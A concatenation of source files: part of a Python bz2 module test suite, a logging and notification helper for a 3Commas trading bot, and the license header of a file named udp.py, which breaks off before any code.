self.createTempFile(streams=5, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testRead0(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(0), b"")
def testReadChunk10(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
text = b''
while True:
chunk = bz2f.read(10)
if not chunk:
break
text += chunk
self.assertEqual(text, self.TEXT)
def testReadChunk10MultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
text = b''
while True:
chunk = bz2f.read(10)
if not chunk:
break
text += chunk
self.assertEqual(text, self.TEXT * 5)
def testRead100(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(100), self.TEXT[:100])
def testPeek(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testReadInto(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
n = 128
b = bytearray(n)
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b, self.TEXT[:n])
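# The remaining data is shorter than the buffer, so readinto reports a short count.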
n = len(self.TEXT) - n
b = bytearray(len(self.TEXT))
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b[:n], self.TEXT[-n:])
def testReadLine(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES:
self.assertEqual(bz2f.readline(), line)
def testReadLineMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES * 5:
self.assertEqual(bz2f.readline(), line)
def testReadLines(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES)
def testReadLinesMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES * 5)
def testIterator(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES)
def testIteratorMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES * 5)
def testClosedIteratorDeadlock(self):
# Issue #3309: Iteration on a closed BZ2File should release the lock.
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.close()
self.assertRaises(ValueError, next, bz2f)
# This call will deadlock if the above call failed to release the lock.
self.assertRaises(ValueError, bz2f.readlines)
def testWrite(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteChunks10(self):
with BZ2File(self.filename, "w") as bz2f:
n = 0
while True:
chunk = self.TEXT[n*10:(n+1)*10]
if not chunk:
break
bz2f.write(chunk)
n += 1
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteNonDefaultCompressLevel(self):
expected = bz2.compress(self.TEXT, compresslevel=5)
with BZ2File(self.filename, "w", compresslevel=5) as bz2f:
bz2f.write(self.TEXT)
with open(self.filename, "rb") as f:
self.assertEqual(f.read(), expected)
def testWriteLines(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.writelines)
bz2f.writelines(self.TEXT_LINES)
# Issue #1535500: Calling writelines() on a closed BZ2File
# should raise an exception.
self.assertRaises(ValueError, bz2f.writelines, ["a"])
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteMethodsOnReadOnlyFile(self):
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(b"abc")
with BZ2File(self.filename, "r") as bz2f:
self.assertRaises(OSError, bz2f.write, b"a")
self.assertRaises(OSError, bz2f.writelines, [b"a"])
def testAppend(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with BZ2File(self.filename, "a") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT * 2)
def testSeekForward(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekForwardAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(len(self.TEXT) + 150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwards(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def testSeekBackwardsAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
readto = len(self.TEXT) + 100
while readto > 0:
readto -= len(bz2f.read(readto))
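# We are now 100 bytes into the second stream; seeking back 150 bytes
# crosses the stream boundary into the first stream.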
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[100-150:] + self.TEXT)
def testSeekBackwardsFromEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150, 2)
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
def testSeekBackwardsFromEndAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-1000, 2)
self.assertEqual(bz2f.read(), (self.TEXT * 2)[-1000:])
def testSeekPostEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwice(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwiceMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPreStart(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT)
def testSeekPreStartMultiStream(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT * 2)
def testFileno(self):
self.createTempFile()
with open(self.filename, 'rb') as rawf:
bz2f = BZ2File(rawf)
try:
self.assertEqual(bz2f.fileno(), rawf.fileno())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.fileno)
def testSeekable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.seekable())
bz2f.read()
self.assertTrue(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
src = BytesIO(self.DATA)
src.seekable = lambda: False
bz2f = BZ2File(src)
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
def testReadable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.readable())
bz2f.read()
self.assertTrue(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
def testWritable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertFalse(bz2f.writable())
bz2f.read()
self.assertFalse(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertTrue(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
def testOpenDel(self):
self.createTempFile()
for i in range(10000):
o = BZ2File(self.filename)
del o
def testOpenNonexistent(self):
self.assertRaises(OSError, BZ2File, "/non/existent")
def testReadlinesNoNewline(self):
# Issue #1191043: readlines() fails on a file containing no newline.
data = b'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
with open(self.filename, "wb") as f:
f.write(data)
with BZ2File(self.filename) as bz2f:
lines = bz2f.readlines()
self.assertEqual(lines, [b'Test'])
with BZ2File(self.filename) as bz2f:
xlines = list(bz2f.readlines())
self.assertEqual(xlines, [b'Test'])
def testContextProtocol(self):
f = None
with BZ2File(self.filename, "wb") as f:
f.write(b"xxx")
f = BZ2File(self.filename, "rb")
f.close()
try:
with f:
pass
except ValueError:
pass
else:
self.fail("__enter__ on a closed file didn't raise an exception")
try:
with BZ2File(self.filename, "wb") as f:
1/0
except ZeroDivisionError:
pass
else:
self.fail("1/0 didn't raise an exception")
@unittest.skipUnless(threading, 'Threading required for this test.')
def testThreading(self):
# Issue #7205: Using a BZ2File from several threads shouldn't deadlock.
data = b"1" * 2**20
nthreads = 10
with BZ2File(self.filename, 'wb') as f:
def comp():
for i in range(5):
f.write(data)
threads = [threading.Thread(target=comp) for i in range(nthreads)]
with support.start_threads(threads):
pass
def testWithoutThreading(self):
module = support.import_fresh_module("bz2", blocked=("threading",))
with module.BZ2File(self.filename, "wb") as f:
f.write(b"abc")
with module.BZ2File(self.filename, "rb") as f:
self.assertEqual(f.read(), b"abc")
def testMixedIterationAndReads(self):
self.createTempFile()
linelen = len(self.TEXT_LINES[0])
halflen = linelen // 2
with BZ2File(self.filename) as bz2f:
bz2f.read(halflen)
self.assertEqual(next(bz2f), self.TEXT_LINES[0][halflen:])
self.assertEqual(bz2f.read(), self.TEXT[linelen:])
with BZ2File(self.filename) as bz2f:
bz2f.readline()
self.assertEqual(next(bz2f), self.TEXT_LINES[1])
self.assertEqual(bz2f.readline(), self.TEXT_LINES[2])
with BZ2File(self.filename) as bz2f:
bz2f.readlines()
self.assertRaises(StopIteration, next, bz2f)
self.assertEqual(bz2f.readlines(), [])
def testMultiStreamOrdering(self):
# Test the ordering of streams when reading a multi-stream archive.
data1 = b"foo" * 1000
data2 = b"bar" * 1000
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(data1)
with BZ2File(self.filename, "a") as bz2f:
bz2f.write(data2)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), data1 + data2)
def testOpenBytesFilename(self):
str_filename = self.filename
try:
bytes_filename = str_filename.encode("ascii")
except UnicodeEncodeError:
self.skipTest("Temporary file name needs to be ASCII")
with BZ2File(bytes_filename, "wb") as f:
f.write(self.DATA)
with BZ2File(bytes_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
# Sanity check that we are actually operating on the right file.
with BZ2File(str_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testDecompressLimited(self):
"""Decompressed data buffering should be limited"""
bomb = bz2.compress(bytes(int(2e6)), compresslevel=9)
self.assertLess(len(bomb), _compression.BUFFER_SIZE)
decomp = BZ2File(BytesIO(bomb))
self.assertEqual(bytes(1), decomp.read(1))
max_decomp = 1 + DEFAULT_BUFFER_SIZE
self.assertLessEqual(decomp._buffer.raw.tell(), max_decomp,
"Excessive amount of data was decompressed")
# Tests for a BZ2File wrapping another file object:
def testReadBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
self.assertFalse(bio.closed)
def testPeekBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testWriteBytesIO(self):
with BytesIO() as bio:
with BZ2File(bio, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
self.assertEqual(ext_decompress(bio.getvalue()), self.TEXT)
self.assertFalse(bio.closed)
def testSeekForwardBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwardsBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def test_read_truncated(self):
# Drop the eos_magic field (6 bytes) and CRC (4 bytes).
truncated = self.DATA[:-10]
with BZ2File(BytesIO(truncated)) as f:
self.assertRaises(EOFError, f.read)
with BZ2File(BytesIO(truncated)) as f:
self.assertEqual(f.read(len(self.TEXT)), self.TEXT)
self.assertRaises(EOFError, f.read, 1)
# Incomplete 4-byte file header, and block header of at least 146 bits.
for i in range(22):
with BZ2File(BytesIO(truncated[:i])) as f:
self.assertRaises(EOFError, f.read, 1)
class BZ2CompressorTest(BaseTest):
def testCompress(self):
bz2c = BZ2Compressor()
self.assertRaises(TypeError, bz2c.compress)
data = bz2c.compress(self.TEXT)
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
bz2c = BZ2Compressor()
data = bz2c.compress(b'')
data += bz2c.flush()
self.assertEqual(data, self.EMPTY_DATA)
def testCompressChunks10(self):
bz2c = BZ2Compressor()
n = 0
data = b''
while True:
chunk = self.TEXT[n*10:(n+1)*10]
if not chunk:
break
data += bz2c.compress(chunk)
n += 1
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
@bigmemtest(size=_4G + 100, memuse=2)
def testCompress4G(self, size):
# "Test BZ2Compressor.compress()/flush() with >4GiB input"
bz2c = BZ2Compressor()
data = b"x" * size
try:
compressed = bz2c.compress(data)
compressed += bz2c.flush()
finally:
data = None # Release memory
data = bz2.decompress(compressed)
try:
self.assertEqual(len(data), size)
self.assertEqual(len(data.strip(b"x")), 0)
finally:
data = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Compressor(), proto)
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
bz2d = BZ2Decompressor()
text = b''
n = 0
while True:
chunk = self.DATA[n*10:(n+1)*10]
if not chunk:
break
text += bz2d.decompress(chunk)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
bz2d = BZ2Decompressor()
unused_data = b"this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, b"anything")
self.assertRaises(EOFError, bz2d.decompress, b"")
@bigmemtest(size=_4G + 100, memuse=3.3)
def testDecompress4G(self, size):
# "Test BZ2Decompressor.decompress() with >4GiB input"
blocksize = 10 * 1024 * 1024
block = random.getrandbits(blocksize * 8).to_bytes(blocksize, 'little')
try:
data = block * (size // blocksize + 1)
compressed = bz2.compress(data)
bz2d = BZ2Decompressor()
decompressed = bz2d.decompress(compressed)
self.assertTrue(decompressed == data)
finally:
data = None
compressed = None
decompressed = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Decompressor(), proto)
def testDecompressorChunksMaxsize(self):
bzd = BZ2Decompressor()
max_length = 100
out = []
# Feed some input
len_ = len(self.BIG_DATA) - 64
out.append(bzd.decompress(self.BIG_DATA[:len_],
max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data without providing more input
out.append(bzd.decompress(b'', max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data while providing more input
out.append(bzd.decompress(self.BIG_DATA[len_:],
max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
# Retrieve remaining uncompressed data
while not bzd.eof:
out.append(bzd.decompress(b'', max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
out = b"".join(out)
self.assertEqual(out, self.BIG_TEXT)
self.assertEqual(bzd.unused_data, b"")
def test_decompressor_inputbuf_1(self):
# Test reusing input buffer after moving existing
# contents to beginning
bzd = BZ2Decompressor()
out = []
# Create input buffer and fill it
self.assertEqual(bzd.decompress(self.DATA[:100],
max_length=0), b'')
# Retrieve some results, freeing capacity at beginning
# of input buffer
out.append(bzd.decompress(b'', 2))
# Add more data that fits into input buffer after
# moving existing data to beginning
out.append(bzd.decompress(self.DATA[100:105], 15))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[105:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_2(self):
# Test reusing input buffer by appending data at the
# end right away
bzd = BZ2Decompressor()
out = []
# Create input buffer and empty it
self.assertEqual(bzd.decompress(self.DATA[:200],
max_length=0), b'')
out.append(bzd.decompress(b''))
# Fill buffer with new data
out.append(bzd.decompress(self.DATA[200:280], 2))
# Append some more data, not enough to require resize
out.append(bzd.decompress(self.DATA[280:300], 2))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_3(self):
# Test reusing input buffer after extending it
bzd = BZ2Decompressor()
out = []
# Create almost full input buffer
out.append(bzd.decompress(self.DATA[:200], 5))
# Add even more data to it, requiring resize
out.append(bzd.decompress(self.DATA[200:300], 5))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_failure(self):
bzd = BZ2Decompressor()
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
# Previously, a second call could crash due to internal inconsistency
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
class CompressDecompressTest(BaseTest):
def testCompress(self):
data = bz2.compress(self.TEXT)
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
text = bz2.compress(b'')
self.assertEqual(text, self.EMPTY_DATA)
def testDecompress(self):
text = bz2.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressEmpty(self):
text = bz2.decompress(b"")
self.assertEqual(text, b"")
def testDecompressToEmptyString(self):
text = bz2.decompress(self.EMPTY_DATA)
self.assertEqual(text, b'')
def testDecompressIncomplete(self):
self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])
def testDecompressBadData(self):
self.assertRaises(OSError, bz2.decompress, self.BAD_DATA)
def testDecompressMultiStream(self):
text = bz2.decompress(self.DATA * 5)
self.assertEqual(text, self.TEXT * 5)
def testDecompressTrailingJunk(self):
text = bz2.decompress(self.DATA + self.BAD_DATA)
self.assertEqual(text, self.TEXT)
def testDecompressMultiStreamTrailingJunk(self):
text = bz2.decompress(self.DATA * 5 + self.BAD_DATA)
self.assertEqual(text, self.TEXT * 5)
class OpenTest(BaseTest):
"Test the open function."
def open(self, *args, **kwargs):
return bz2.open(*args, **kwargs)
def test_binary_modes(self):
for mode in ("wb", "xb"):
if mode == "xb":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "rb") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "ab") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_implicit_binary_modes(self):
# Test implicit binary modes (no "b" or "t" in mode string).
for mode in ("w", "x"):
if mode == "x":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "a") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_text_modes(self):
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
for mode in ("wt", "xt"):
if mode == "xt":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt") as f:
self.assertEqual(f.read(), text)
with self.open(self.filename, "at") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol * 2)
def test_x_mode(self):
for mode in ("x", "xb", "xt"):
unlink(self.filename)
with self.open(self.filename, mode) as f:
pass
with self.assertRaises(FileExistsError):
with self.open(self.filename, mode) as f:
pass
def test_fileobj(self):
with self.open(BytesIO(self.DATA), "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(BytesIO(self.DATA), "rb") as f:
self.assertEqual(f.read(), self.TEXT)
text = self.TEXT.decode("ascii")
with self.open(BytesIO(self.DATA), "rt") as f:
self.assertEqual(f.read(), text)
def test_bad_params(self):
# Test invalid parameter combinations.
self.assertRaises(ValueError,
self.open, self.filename, "wbt")
self.assertRaises(ValueError,
self.open, self.filename, "xbt")
self.assertRaises(ValueError,
self.open, self.filename, "rb", encoding="utf-8")
self.assertRaises(ValueError,
self.open, self.filename, "rb", errors="ignore")
self.assertRaises(ValueError,
self.open, self.filename, "rb", newline="\n")
def test_encoding(self):
# Test non-default encoding.
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
with self.open(self.filename, "wt", encoding="utf-16-le") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("utf-16-le")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt", encoding="utf-16-le") as f:
self.assertEqual(f.read(), text)
def test_encoding_error_handler(self):
# Test with non-default encoding error handler.
with self.open(self.filename, "wb") as f:
f.write(b"foo\xffbar")
with self.open(self.filename, "rt", encoding="ascii", errors="ignore") \
as f:
self.assertEqual(f.read(), "foobar")
def test_newline(self):
# Test with explicit newline (universal newline mode disabled).
text = self.TEXT.decode("ascii")
with self.open(self.filename, "wt", newline="\n") as f:
f.write(text)
with self.open(self.filename, "rt", newline="\r") as f:
self.assertEqual(f.readlines(), [text])
def test_main():
support.run_unittest(
BZ2FileTest,
BZ2CompressorTest,
BZ2DecompressorTest,
CompressDecompressTest,
OpenTest,
)
support.reap_children()
if __name__ == '__main__':
test_main()
|
logging.py | """Cyberjunky's 3Commas bot helpers."""
import json
import logging
import os
import queue
import threading
import time
from logging.handlers import TimedRotatingFileHandler as _TimedRotatingFileHandler
import apprise
class NotificationHandler:
"""Notification class."""
def __init__(self, program, enabled=False, notify_urls=None):
self.program = program
self.message = ""
if enabled and notify_urls:
self.apobj = apprise.Apprise()
urls = json.loads(notify_urls)
for url in urls:
self.apobj.add(url)
self.queue = queue.Queue()
self.start_worker()
self.enabled = True
else:
self.enabled = False
def start_worker(self):
"""Start notification worker."""
threading.Thread(target=self.process_queue, daemon=True).start()
def process_queue(self):
"""Process the queue."""
while True:
message, attachments = self.queue.get()
if attachments:
self.apobj.notify(body=message, attach=attachments)
else:
self.apobj.notify(body=message)
self.queue.task_done()
def queue_notification(self, message):
"""Queue notification messages."""
if self.enabled:
# Validate that the message is UTF-8 encodable before buffering it
message.encode(encoding="UTF-8", errors="strict")
self.message += f"{message}\n\n"
def send_notification(self):
"""Send the notification messages if there are any."""
if self.enabled and self.message:
msg = f"[3C Cyber Bot-Helper {self.program}]\n\n" + self.message
self.queue.put((msg, []))
self.message = ""
class TimedRotatingFileHandler(_TimedRotatingFileHandler):
"""Override original code to fix bug with not deleting old logfiles."""
def __init__(self, filename="", when="midnight", interval=1, backupCount=7, encoding='utf-8'):
super().__init__(
filename=filename,
when=when,
interval=int(interval),
backupCount=int(backupCount),
encoding=encoding
)
def getFilesToDelete(self):
"""Find all logfiles present."""
dirname, basename = os.path.split(self.baseFilename)
filenames = os.listdir(dirname)
result = []
prefix = basename + "."
plen = len(prefix)
for filename in filenames:
if filename[:plen] == prefix:
suffix = filename[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirname, filename))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[: len(result) - self.backupCount]
return result
def doRollover(self):
"""Delete old logfiles but keep latest backupCount amount."""
# Perform the rollover here instead of calling super().doRollover(),
# which would rotate a second time and leave an empty rotated file behind.
self.close()
timetuple = time.localtime(time.time())
dfn = self.baseFilename + "." + time.strftime(self.suffix, timetuple)
if os.path.exists(dfn):
os.remove(dfn)
os.rename(self.baseFilename, dfn)
if self.backupCount > 0:
for oldlog in self.getFilesToDelete():
os.remove(oldlog)
# Reopen via _open() so the configured encoding is honoured
self.stream = self._open()
currenttime = int(time.time())
newrolloverat = self.computeRollover(currenttime)
while newrolloverat <= currenttime:
newrolloverat = newrolloverat + self.interval
self.rolloverAt = newrolloverat
class Logger:
"""Logger class."""
my_logger = None
def __init__(
self,
datadir,
program,
notificationhandler,
logstokeep,
debug_enabled,
notify_enabled,
):
"""Logger init."""
self.my_logger = logging.getLogger()
self.datadir = datadir
self.program = program
self.notify_enabled = notify_enabled
self.notificationhandler = notificationhandler
if debug_enabled:
self.my_logger.setLevel(logging.DEBUG)
self.my_logger.propagate = False
else:
self.my_logger.setLevel(logging.INFO)
self.my_logger.propagate = False
date_fmt = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(
f"%(asctime)s - {program} - %(levelname)s - %(message)s", date_fmt
)
console_formatter = logging.Formatter(
f"%(asctime)s - {program} - %(levelname)s - %(message)s", date_fmt
)
# Create directory if not exists
if not os.path.exists(f"{self.datadir}/logs"):
os.makedirs(f"{self.datadir}/logs")
# Log to file and rotate if needed
file_handle = TimedRotatingFileHandler(
filename=f"{self.datadir}/logs/{self.program}.log", backupCount=logstokeep, encoding='utf-8'
)
file_handle.setFormatter(formatter)
self.my_logger.addHandler(file_handle)
# Log to console
console_handle = logging.StreamHandler()
console_handle.setLevel(logging.INFO)
console_handle.setFormatter(console_formatter)
self.my_logger.addHandler(console_handle)
self.info(f"3C Cyber Bot-Helper {program}")
self.info("Started on %s" % time.strftime("%A %H:%M:%S %Y-%m-%d"))
if self.notify_enabled:
self.info("Notifications are enabled")
else:
self.info("Notifications are disabled")
def log(self, message, level="info"):
"""Call the log levels."""
if level == "info":
self.my_logger.info(message)
elif level == "warning":
self.my_logger.warning(message)
elif level == "error":
self.my_logger.error(message)
elif level == "debug":
self.my_logger.debug(message)
def info(self, message, notify=False):
"""Info level."""
self.log(message, "info")
if self.notify_enabled and notify:
self.notificationhandler.queue_notification(message)
def warning(self, message, notify=True):
"""Warning level."""
self.log(message, "warning")
if self.notify_enabled and notify:
self.notificationhandler.queue_notification(message)
def error(self, message, notify=True):
"""Error level."""
self.log(message, "error")
if self.notify_enabled and notify:
self.notificationhandler.queue_notification(message)
def debug(self, message, notify=False):
"""Debug level."""
self.log(message, "debug")
if self.notify_enabled and notify:
self.notificationhandler.queue_notification(message)
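# A minimal usage sketch (hypothetical values, not part of the original
# module): wire a disabled NotificationHandler into a Logger that writes
# its logfiles under ./data/logs.
if __name__ == "__main__":
demo_handler = NotificationHandler(program="demo", enabled=False)
demo_logger = Logger(
datadir="data",
program="demo",
notificationhandler=demo_handler,
logstokeep=7,
debug_enabled=False,
notify_enabled=False,
)
demo_logger.info("Logger demo started")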
|
udp.py | #!/usr/bin/env https://github.com/Tandelajr/mr.tandela
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
